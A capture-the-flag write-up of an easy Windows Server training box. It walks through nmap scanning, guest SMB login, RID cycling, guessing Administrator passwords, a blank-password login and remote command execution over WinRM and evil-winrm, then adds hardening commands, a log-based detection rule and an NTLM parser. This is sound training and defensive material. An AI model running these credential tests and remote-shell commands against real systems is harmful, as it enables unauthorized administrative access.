Box info
- OS: Windows Server 2019 Standard Build 17763 x64
- Difficulty: Very Easy
- Tier: 0
- Status: Starting Point
- Skills: SMB enumeration, RDP basics, WinRM, blank-password credential testing
- Pwned: 2026-04-27
TL;DR
Explosion is a Windows Server 2019 box with a single critical misconfiguration: the built-in Administrator account has a blank password. A port scan reveals SMB (445), RDP (3389), and WinRM (5985). SMB guest login enumerates the machine name and RID-cycles the Administrator account. Testing Administrator with a blank password via nxc immediately returns Pwn3d! over both SMB and WinRM. The flag sits on the Administrator’s desktop at C:\Users\Administrator\Desktop\flag.txt. The lesson: always test default and blank credentials before reaching for a wordlist.
Recon
1. Liveness check
$ ping -c 3 10.129.36.59
PING 10.129.36.59 (10.129.36.59): 56 data bytes
Request timeout for icmp_seq 0
100% packet loss
ICMP filtered — Windows Server often blocks ICMP at the host firewall. Use -Pn with nmap.
2. Top-1000 port sweep
$ sudo nmap -sS -Pn --top-ports 1000 -T4 10.129.36.59
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
Classic Windows fingerprint:
- 135 — Microsoft RPC endpoint mapper
- 139/445 — SMB (NetBIOS session service + microsoft-ds)
- 3389 — RDP (Remote Desktop Protocol — the box name “Explosion” is a hint)
- 5985 — WinRM (Windows Remote Management, used by PowerShell remoting and evil-winrm)
3. Service detection + script scan
$ sudo nmap -sS -Pn -sV -sC -p 135,139,445,3389,5985 10.129.36.59
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
3389/tcp open ms-wbt-server
| rdp-ntlm-info:
| Target_Name: EXPLOSION
| NetBIOS_Computer_Name: EXPLOSION
| DNS_Computer_Name: Explosion
| Product_Version: 10.0.17763
|_ System_Time: 2026-04-27T13:55:38+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0
Key data points:
- Machine name: EXPLOSION (from RDP NTLM info — exposed before any auth)
- OS: Windows 10.0.17763 = Windows Server 2019 Build 17763
- SMB signing: not required (relay attacks possible)
Foothold
Dead end #1 — anonymous SMB
$ smbclient -N -L //10.129.36.59
session setup failed: NT_STATUS_ACCESS_DENIED
Pure anonymous blocked. Guest still allowed?
$ nxc smb 10.129.36.59 -u 'guest' -p ''
EXPLOSION\guest: — [+] login accepted (no Pwn3d! = no admin rights)
Guest is accepted but there are no interesting non-admin shares. Only ADMIN$, C$, and IPC$ — all require elevated credentials.
Dead end #2 — common passwords for Administrator
The Administrator account (RID 500) was found via RID cycling through IPC$:
$ nxc smb 10.129.36.59 -u 'guest' -p '' --rid-brute
500: EXPLOSION\Administrator (SidTypeUser)
Before trying blank, tested several common Windows passwords:
$ nxc smb 10.129.36.59 -u 'Administrator' -p 'explosion'
EXPLOSION\Administrator:explosion → STATUS_LOGON_FAILURE
$ nxc smb 10.129.36.59 -u 'Administrator' -p 'Explosion'
STATUS_LOGON_FAILURE
$ nxc smb 10.129.36.59 -u 'Administrator' -p 'Password1'
STATUS_LOGON_FAILURE
All failed. Then tried the obvious:
Working approach — Administrator with blank password
$ nxc smb 10.129.36.59 -u 'Administrator' -p ''
SMB 10.129.36.59 445 EXPLOSION [+] Explosion\Administrator: (Pwn3d!)
Pwn3d! is nxc's marker confirming administrator-level SMB access.
Verify WinRM works too:
$ nxc winrm 10.129.36.59 -u 'Administrator' -p ''
WINRM 10.129.36.59 5985 EXPLOSION [+] Explosion\Administrator: (Pwn3d!)
Both SMB and WinRM accept the blank password. Full administrative access.
Command execution via WinRM
$ nxc winrm 10.129.36.59 -u 'Administrator' -p '' \
-X 'whoami; hostname; Get-ComputerInfo | Select-Object WindowsProductName, OsVersion'
[+] Executed command (shell type: powershell)
explosion\administrator
Explosion
WindowsProductName OsVersion
------------------ ---------
Windows Server 2019 Standard 10.0.17763
Flag collection
Get-ChildItem -Path C:\Users\Administrator\Desktop
# flag.txt - 34 bytes - 4/23/2021 2:51 AM
Get-Content C:\Users\Administrator\Desktop\flag.txt
[REDACTED]
Interactive session (evil-winrm)
For a proper interactive shell (required for more complex post-exploitation):
evil-winrm -i 10.129.36.59 -u Administrator -p ''
Note: On macOS, the system Ruby (2.6) is too old for evil-winrm 3.9. Fix: brew install ruby && /opt/homebrew/opt/ruby/bin/gem install evil-winrm.
Privilege Escalation
N/A — The Administrator account with a blank password already provides NT AUTHORITY\SYSTEM-equivalent access (Administrator on a standalone Windows machine is the highest local privilege). No escalation step required.
What’s actually broken
- Blank Administrator password. The single most critical finding. Windows' built-in Administrator account (RID 500) with an empty password is a direct full-system compromise. This violates CIS Control 5.4 (Default Credentials), STIG WN19-AC-000110, and every sensible password policy.
- SMB guest access enabled. Allows unauthenticated clients to enumerate shares and — via IPC$ — RID-cycle to discover account names.
- WinRM exposed. Port 5985 reachable from the internet. WinRM should be restricted to management networks only.
- SMB signing not required. A relay attacker on the same segment can forward captured NTLM challenges to other Windows hosts.
- Administrator account not renamed. The known RID-500 account should be renamed or disabled; a separate named admin account should be used instead.
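The foothold sequence above (guest share listing and RID cycling, three failed Administrator guesses, then a successful blank-password network logon) leaves a recognisable trail in the Windows Security log. The following detection rule is an added example, not part of the original writeup; it runs over constructed 4624/4625 event records, assumes the 10.10.0.0/16 management range from the remediation section, and uses 192.0.2.77 as a constructed attacker address.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta

MGMT_NET = ipaddress.ip_network("10.10.0.0/16")   # management range from the remediation firewall rule

# Constructed Security-log events (not real telemetry) modelled on this box's session:
# guest share enumeration, three failed Administrator guesses, then the blank-password success.
# 4625 = failed logon, 4624 = successful logon, logon type 3 = network (SMB/WinRM).
SAMPLE_EVENTS = [
    {"time": "2026-04-27T13:58:01", "id": 4624, "user": "Guest",         "type": 3, "ip": "192.0.2.77"},
    {"time": "2026-04-27T13:58:40", "id": 4625, "user": "Administrator", "type": 3, "ip": "192.0.2.77"},
    {"time": "2026-04-27T13:58:45", "id": 4625, "user": "Administrator", "type": 3, "ip": "192.0.2.77"},
    {"time": "2026-04-27T13:58:52", "id": 4625, "user": "Administrator", "type": 3, "ip": "192.0.2.77"},
    {"time": "2026-04-27T13:59:10", "id": 4624, "user": "Administrator", "type": 3, "ip": "192.0.2.77"},
    {"time": "2026-04-27T14:30:00", "id": 4624, "user": "Administrator", "type": 3, "ip": "10.10.0.12"},
    {"time": "2026-04-27T14:31:00", "id": 4624, "user": "svc-mgmt",      "type": 3, "ip": "10.10.0.12"},
]

def detect(events, window=timedelta(minutes=10), min_failures=2):
    """Return alert strings for the patterns this writeup leaves in the Security log:
    - any Guest network logon (share listing / RID cycling over IPC$)
    - a built-in Administrator network logon from outside the management range
    - a built-in Administrator network logon preceded by failed attempts from the same source"""
    alerts, failures = [], defaultdict(list)            # failures: (user, ip) -> timestamps of 4625s
    for ev in sorted(events, key=lambda e: e["time"]):
        ts, user, ip = datetime.fromisoformat(ev["time"]), ev["user"].lower(), ev["ip"]
        if ev["id"] == 4625:
            failures[(user, ip)].append(ts)
            continue
        if ev["id"] != 4624 or ev["type"] != 3:
            continue
        if user == "guest":
            alerts.append(f"{ev['time']} guest network logon from {ip}")
        elif user == "administrator":
            if ipaddress.ip_address(ip) not in MGMT_NET:
                alerts.append(f"{ev['time']} Administrator network logon from non-management host {ip}")
            recent = [t for t in failures[(user, ip)] if timedelta(0) <= ts - t <= window]
            if len(recent) >= min_failures:
                alerts.append(f"{ev['time']} Administrator logon from {ip} after {len(recent)} failures")
    return alerts

def sample_alerts():
    """Run the rule over the constructed events; the management-host logons produce no alert."""
    return detect(SAMPLE_EVENTS)
```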
Remediation (the boring half)
Set a strong Administrator password immediately:
```powershell
# Example value only: in practice prompt with Read-Host -AsSecureString instead of hard-coding a password in a script
$SecurePassword = ConvertTo-SecureString "R@nd0m!P@ssw0rd#2024" -AsPlainText -Force
Set-LocalUser -Name "Administrator" -Password $SecurePassword
```
Disable guest SMB access:
```powershell
# Turning off SMBv1 is general hardening; it does not by itself stop guest logons
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
# Disabling the Guest account is what actually blocks the guest / blank-password session used above
Disable-LocalUser -Name "Guest"
```
Require SMB signing:
```powershell
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
```
Restrict WinRM to management VLAN:
```powershell
# Allow only from 10.10.0.0/16
New-NetFirewallRule -Name "WinRM-Restrict" -DisplayName "WinRM Management Only" `
    -Protocol TCP -LocalPort 5985 -RemoteAddress "10.10.0.0/16" `
    -Action Allow
Disable-NetFirewallRule -Name "WINRM-HTTP-In-TCP"
```
Disable the built-in Administrator account and create a named admin:
```powershell
# Create and verify the replacement admin first; disabling Administrator before that can lock you out
New-LocalUser -Name "svc-mgmt" -Password (Read-Host -AsSecureString)
Add-LocalGroupMember -Group "Administrators" -Member "svc-mgmt"
Disable-LocalUser -Name "Administrator"
```
MITRE ATT&CK mapping
| Tactic | Technique | How it shows up here |
|---|---|---|
| Reconnaissance | T1046 — Network Service Discovery | nmap identifies RDP, SMB, WinRM |
| Discovery | T1087 — Account Discovery | RID cycling via SMB guest → finds Administrator account |
| Initial Access | T1078 — Valid Accounts | Administrator login with blank password |
| Lateral Movement | T1021.006 — Windows Remote Management | WinRM (5985) used for remote command execution |
| Collection | T1005 — Data from Local System | Reading flag.txt from Administrator’s Desktop |
Lessons learned
- Try blank before trying wordlists. The single most impactful test on a fresh Windows machine is Administrator with an empty password. It takes one request and costs nothing. Wordlists come after.
- RDP NTLM info leaks machine metadata pre-auth. The rdp-ntlm-info nmap script extracts the machine name, domain, and exact Windows build version from the NTLM negotiation — no credentials required. This is normal Windows behavior, not a vulnerability.
- WinRM is PowerShell remoting over HTTP. When SMB is available, psexec/wmiexec are typical choices. When SMB is present but credentials are needed for the admin share, or if SMB is firewalled, WinRM on 5985 is the alternative. Both are in the standard pentest toolkit.
- Pwn3d! in nxc output means local admin. NetExec's color-coding and Pwn3d! marker specifically indicate that the tested credentials have local administrator rights — useful for distinguishing regular user auth from privileged access at a glance.
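The "Key data points" in Recon and the rdp-ntlm-info lesson above both come from the same source: the NTLMSSP CHALLENGE (Type 2) message the server returns during RDP's NLA handshake, whose TargetInfo AV_PAIR list and Version structure carry the names, build and clock. The parser below is an added example, not code from the writeup or from nmap; the sample message is constructed here from the writeup's own nmap values (EXPLOSION, build 17763, 2026-04-27T13:55:38) rather than captured from the box.

```python
import struct
from datetime import datetime, timedelta, timezone

AV_NAMES = {1: "NetBIOS_Computer_Name", 2: "NetBIOS_Domain_Name",      # AvId values (MS-NLMP 2.2.2.1)
            3: "DNS_Computer_Name", 4: "DNS_Domain_Name", 5: "DNS_Tree_Name"}
AV_TIMESTAMP = 7                      # 64-bit FILETIME, 100 ns ticks since 1601-01-01
NEGOTIATE_VERSION = 0x02000000        # flag: the 8-byte Version structure is present
EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

def parse_ntlm_challenge(msg: bytes) -> dict:
    """Extract the fields rdp-ntlm-info reports from an NTLMSSP CHALLENGE (Type 2) message."""
    if msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 2:
        raise ValueError("not an NTLMSSP CHALLENGE message")
    tn_len, _, tn_off = struct.unpack_from("<HHI", msg, 12)   # TargetName: len, maxlen, offset
    flags = struct.unpack_from("<I", msg, 20)[0]
    ti_len, _, ti_off = struct.unpack_from("<HHI", msg, 40)   # TargetInfo: len, maxlen, offset
    info = {"Target_Name": msg[tn_off:tn_off + tn_len].decode("utf-16-le")}
    if flags & NEGOTIATE_VERSION:
        major, minor, build = struct.unpack_from("<BBH", msg, 48)
        info["Product_Version"] = f"{major}.{minor}.{build}"
    pos, end = ti_off, ti_off + ti_len
    while pos + 4 <= end:                                     # AV_PAIR list; MsvAvEOL (id 0, len 0) is last
        av_id, av_len = struct.unpack_from("<HH", msg, pos)
        val = msg[pos + 4:pos + 4 + av_len]
        pos += 4 + av_len
        if av_id in AV_NAMES:
            info[AV_NAMES[av_id]] = val.decode("utf-16-le")
        elif av_id == AV_TIMESTAMP:
            ticks = struct.unpack("<Q", val)[0]
            info["System_Time"] = EPOCH_1601 + timedelta(microseconds=ticks // 10)
    return info

def build_sample_challenge(name: str, build: int, when: datetime) -> bytes:
    """Constructed Type 2 message (not a capture) laid out the way a Windows host answers RDP NLA."""
    u = lambda s: s.encode("utf-16-le")
    ticks = int((when - EPOCH_1601).total_seconds()) * 10_000_000
    pairs = [(1, u(name)), (2, u(name)), (3, u(name.capitalize())),
             (4, u(name.capitalize())), (AV_TIMESTAMP, struct.pack("<Q", ticks)), (0, b"")]
    av = b"".join(struct.pack("<HH", i, len(v)) + v for i, v in pairs)
    target, hdr = u(name), 56                                 # fixed header is 56 bytes
    return (b"NTLMSSP\x00" + struct.pack("<I", 2)
            + struct.pack("<HHI", len(target), len(target), hdr)
            + struct.pack("<I", NEGOTIATE_VERSION | 0x00800000 | 0x00000001)  # VERSION|TARGET_INFO|UNICODE
            + bytes(16)                                       # ServerChallenge + Reserved (zeroed here)
            + struct.pack("<HHI", len(av), len(av), hdr + len(target))
            + struct.pack("<BBHBBBB", 10, 0, build, 0, 0, 0, 15)  # Version: 10.0.<build>, rev 15
            + target + av)

def explosion_demo() -> dict:
    when = datetime(2026, 4, 27, 13, 55, 38, tzinfo=timezone.utc)   # values from this writeup's nmap output
    return parse_ntlm_challenge(build_sample_challenge("EXPLOSION", 17763, when))
```

The same parser works on a Type 2 message pulled from an SMB, HTTP (WWW-Authenticate: NTLM) or RDP CredSSP exchange, since the message layout does not depend on the transport.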
🤖 AI-assist log
Transparency over polish. This is exactly where Claude was in the loop on this box.
Note: AI-assist log reconstructed from writeup context; original session interaction logs not available.
| Step | What I asked | What Claude returned | What I changed |
|---|---|---|---|
| PowerShell && vs ; | “Why does cmd1 && cmd2 fail in WinRM PowerShell?” | Explained: && is cmd.exe syntax; PowerShell uses ; as statement separator. PowerShell remoting sessions use PowerShell, not cmd.exe. | Used directly — explained the dead-end in the session log. |
| evil-winrm on macOS | “evil-winrm gem install fails on macOS — Ruby version issue?” | Identified system Ruby 2.6 incompatibility; evil-winrm 3.9 requires Ruby >= 3.0. Suggested brew install ruby and using the Homebrew-managed gem binary. | Used directly — documented in the session. |
| RDP NTLM info | “What is rdp-ntlm-info showing in nmap output?” | Explained the NTLM negotiation handshake during TLS setup — server sends NTLMSSP_NEGOTIATE which contains machine name, domain, and OS version before any auth. Not a vulnerability, just Windows behavior. | Added to Recon section. |
| MITRE for blank password | “Map blank Administrator password WinRM login to ATT&CK.” | Suggested T1078 (Valid Accounts) as primary. Noted this could also qualify as T1110.001 (Brute Force: Password Guessing) if guessing was involved. | Kept T1078 only — we tested the exact account name without guessing. Added T1021.006 for WinRM lateral movement. |
What Claude got wrong: Nothing significant; Windows auth and PowerShell syntax were accurate. What Claude couldn’t do: Connect to the target; all commands ran locally. Net assist value: Medium — mainly useful for PowerShell syntax issues and nmap output explanation.
References
- HTB Starting Point — official page
- Microsoft Docs — WinRM configuration
- MITRE ATT&CK T1021.006 — Windows Remote Management
- CIS Benchmark for Windows Server 2019 — Section 1.1.1 — password complexity
- DISA STIG WN19-AC-000110 — built-in administrator account password policy
